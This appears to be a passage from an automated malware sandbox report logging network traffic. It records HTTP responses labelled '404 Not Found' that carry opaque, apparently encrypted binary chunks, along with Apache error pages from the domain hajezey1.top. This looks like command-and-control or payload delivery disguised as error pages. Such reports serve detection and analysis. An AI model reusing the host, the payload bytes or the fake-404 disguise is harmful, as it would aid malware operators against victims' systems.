Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 81 71 e5 77 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 a5 98 87 cd 2b 80 78 51 a1 a2 8f bc 82 df 1c e0 32 02 50 08 88 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 01 82 20 59 55 11 5c 2c 34 67 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 01 75 cb 8a 40 d8 06 0e 45 07 13 7d 7b f9 e0 04 89 f9 d4 57 80 90 70 89 ec be 4a 6b 0e e1 a2 22 48 92 d2 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 53 68 58 96 da 19 d1 3a 2d e8 43 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 65 85 4a 04 38 ad 7f 14 2c d0 e8 b1 14 23 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 41 64 cd 25 5c 8d b7 f5 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 75 8d b5 be 34 56 9b 46 76 99 86 11 00 83 32 42 92 51 ce ae b8 6b 95 36 e1 48 52 67 76 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 